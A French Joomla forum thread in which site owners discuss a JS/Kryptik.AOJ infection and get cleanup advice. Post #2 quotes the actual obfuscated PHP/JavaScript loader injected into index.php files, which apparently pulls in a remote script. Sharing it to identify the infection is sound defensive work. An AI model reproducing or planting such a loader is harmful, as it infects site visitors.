Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'avenir ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'avenir ?

    Bonjour à toutes et à tous,
    Mon site est en cours de construction, il n'est pas accessible sans un login.
    Aujourd'hui, je tente d'y accéder et mon anti-virus ESET NOD m'indique qu'il y a un trojan nommé JS/kryptik.AOJ.
    ESET me bloque l'accès à mon site (j'imagine qu'il en sera de même pour mes clients si je ne corrige pas ce problème avant de mettre mon site en ligne)

    ESET ne m'indiquant pas ou se trouve le Trojan, je suis en train de télécharger mon site sur mon PC pour faire une recherche par l'antivirus.
    Je vais bien arriver à le trouver et à le supprimer (enfin, j'espère)...

    Avez vous des infos sur ce trojan?
    Pourriez vous me conseiller pour protéger un peu mieux mon site?
    Quelles opérations dois-je faire après avoir nettoyé mon site de ce trojan?

    Merci d'avance pour votre aide.
    Dernière édition par VantAgeBZH à 30/09/2013, 10h57

  • #2
    Re : Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'aveni

    Envoyé par VantAgeBZH Voir le message
    Bonjour à toutes et à tous,
    Mon site est en cours de construction, il n'est pas accessible sans un login.
    Aujourd'hui, je tente d'y accéder et mon anti-virus ESET NOD m'indique qu'il y a un trojan nommé JS/kryptik.AOJ.
    ESET me bloque l'accès à mon site (j'imagine qu'il en sera de même pour mes clients si je ne corrige pas ce problème avant de mettre mon site en ligne)

    ESET ne m'indiquant pas ou se trouve le Trojan, je suis en train de télécharger mon site sur mon PC pour faire une recherche par l'antivirus.
    Je vais bien arriver à le trouver et à le supprimer (enfin, j'espère)...

    Avez vous des infos sur ce trojan?
    Pourriez vous me conseiller pour protéger un peu mieux mon site?
    Quelles opérations dois-je faire après avoir nettoyé mon site de ce trojan?

    Merci d'avance pour votre aide.
    Bonjour à toi.
    Je viens d'avoir aujourd'hui le même soucis que toi.
    Infection par ce troyen, et pour le moment impossible de faire quoi que ce soit.
    J'ai trouvé après une petite recherche

    <?
    #d47c75#
    echo "<script type=\"text/javascript\" language=\"javascript\" >kszga=\"y\";pnk=\"d\"+\"o\"+\"c\"+\"u\"+\"ment\"; try{+function(){if(document.querySelector)--(window[pnk].getElementById(\"asd\"))}()}catch(csim){hypxtz=fu nction(swe){swe=\"fro\"+swe;for(yib=0;yib<kszga.le ngth;yib++){hgqoy+=String[swe](lgsdi(bkp+(kszga[yib]))-(25));}};};lgsdi=(window.eval);bkp=\"0x\";ujaqcr=0 ;if(!ujaqcr){try{++lgsdi(pnk)[\"\x62o\"+\"d\"+kszga]}catch(csim){ouke=\"^\";}kszga=\"7d^88^7c^8e^86^7e ^87^8d^47^90^8b^82^8d^7e^41^40^55^8c^7c^8b^82^89^8 d^39^8d^92^89^7e^56^3b^8d^7e^91^8d^48^83^7a^40^39^ 44^39^40^8f^7a^8c^7c^8b^82^89^8d^3b^39^8c^8b^7c^56 ^3b^81^8d^8d^89^53^48^48^7a^7d^8f^7a^87^7c^7e^7d^8 d^8b^7a^7c^84^7e^8b^88^87^7e^47^87^7e^8d^48^4a^48^ 8c^8d^7a^8d^8c^47^89^81^89^3b^39^87^7a^86^7e^56^3b ^8a^90^4a^52^3b^57^55^48^8c^40^39^44^39^40^7c^8b^8 2^89^8d^57^40^42^54\".split(ouke);hgqoy=\"\";hypxt z(\"mCharCode\");lgsdi(\"\"+hgqoy);}</script>";
    #/d47c75#
    ?>/css/template.css" media="screen">

    Qui se met dans les index.php.

    Ton template, l'aurais tu fais avec artisteer ?

    Commentaire


    • #3
      Re : Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'aveni

      dans un premier temps, modifie ton pass ftp/ssh

      tu peux aussi faire un find via ssh pour supprimer le trojan dans tous tes index.php... ou demander à ton hébergeur de le faire... ou faire comme tu fais en téléchargeant ton site entièrement mais c'est long...

      si le pirate n'as pas eu d'accès ftp, il se peut qu'il ait utilisé une faille d'un composant de joomla permettant l'upload de fichiers.
      une fois son fichier sur ton serveur, il l'appelle ce qui provoque l'exécution d'une commande find sur ton serveur et le remplacement dans tous tes index.php

      donc, vérifie les dossiers de déchargement de tes composants et tout le dossier images pour voir si tu ne trouves pas un intru...
      regarde les dates de modif des fichiers et dossiers, ça peut aider à trouver plus rapidement
      Christophe
      http://www.webcrea.fr

      Commentaire


      • #4
        Re : Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'aveni

        Envoyé par kiki63 Voir le message
        Bonjour à toi.
        Ton template, l'aurais tu fais avec artisteer ?
        Non je n'ai pas fait mon site avec Artiser, j'ai pris un template chez Shape5.
        En tout cas merci pour d'avoir partager tes éléments de recherche, je vais vois si je trouve le même genre d'éléments sur les fichiers de mon site.

        dans un premier temps, modifie ton pass ftp/ssh
        c'est ce que je vais faire immédiatement

        tu peux aussi faire un find via ssh pour supprimer le trojan dans tous tes index.php... ou demander à ton hébergeur de le faire... ou faire comme tu fais en téléchargeant ton site entièrement mais c'est long...
        je suis novice en création de site, comment dois-je procéder pour faire la recherche par SSH?
        Qu'est ce que je dois chercher exactement? (en ayant téléchargé mon site sur mon PC puis en l'ayant passé à mon anti-virus (celui-là même qui me l'a détecté sur mon site) je n'ai aucun résultat, aucun virus, aucun malware ou autres trojan...


        si le pirate n'as pas eu d'accès ftp, il se peut qu'il ait utilisé une faille d'un composant de joomla permettant l'upload de fichiers.
        hummm, il faut que je regarde tout cela de près... je vais essayer de lister tous les composants, modules et plugins permettant l'upload... J'ai créé mon site en utilisant une version de Joomla incluant des exemple (installation pour débutants... vous voyez...)
        Faire cette recherche va au moins me permettre de comprendre un peu mieux tout le fonctionnement de joomla.

        une fois son fichier sur ton serveur, il l'appelle ce qui provoque l'exécution d'une commande find sur ton serveur et le remplacement dans tous tes index.php

        donc, vérifie les dossiers de déchargement de tes composants et tout le dossier images pour voir si tu ne trouves pas un intru...
        regarde les dates de modif des fichiers et dossiers, ça peut aider à trouver plus rapidement
        Merci bien pour toutes ces infos... je vais m'en occuper de ce pas et vous tenir au courant de l'avancement.
        A+

        Commentaire


        • #5
          Re : Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'aveni

          Bon, et bien les lois de l'informatique sont décidément impénétrables...
          Hier soir j'ai mis à jour mon site (mes extensions l'étaient déjà) puis j'ai changé mes mots de passe.
          Quelques minutes après j'ai retenté de me connecter et le problème était toujours présent.

          Cet après midi, je décide de suivre vos conseils, de faire mes recherches etc... mais je décide au préalable de retenter la connexion histoire de revoir le problème en live... et là tout fonctionne!!... serait-ce les petits doigts divins du seigneur qui ont tout corrigé? ou bien ceux de mon hébergeur? mystère et boule de gomme...

          Bref, je vais passer ce topic en réglé...
          Merci encore pour votre aide.

          Commentaire


          • #6
            Re : Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'aveni

            Je me suis enflammé un peu vite... le problème est revenu...
            D'autres personnes ayant eu ces mêmes déboires auraient elle trouvé une solution?
            Merci d'avance.

            Commentaire


            • #7
              Re : Trojan JS/Kryptik.AOJ empeche l'affichage du site, comment me protéger à l'aveni

              Si rien n'est corrigé , le trojan sera toujours là ... du coté obscur de la force

              Comme te l'a si bien expliqué webcrea, le trojan n'est pas apparu comme çà, comme par enchantement. Il a profité d'une faille quelquonque (il peu en avoir tellement) ou d'un accès FTP
              Il faut que tu t’attèles a faire des recherches. Aide toi des date de modif sur le FTP et de tes logs
              Fait aussi un scan complet de ta machine en local !!!!


              En passant : quelle version de Joomla! avais tu? Quel hebergeur?
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire

              Annonce

              Réduire
              Aucune annonce pour le moment.

              Partenaire de l'association

              Réduire

              Hébergeur Web PlanetHoster
              Travaille ...
              X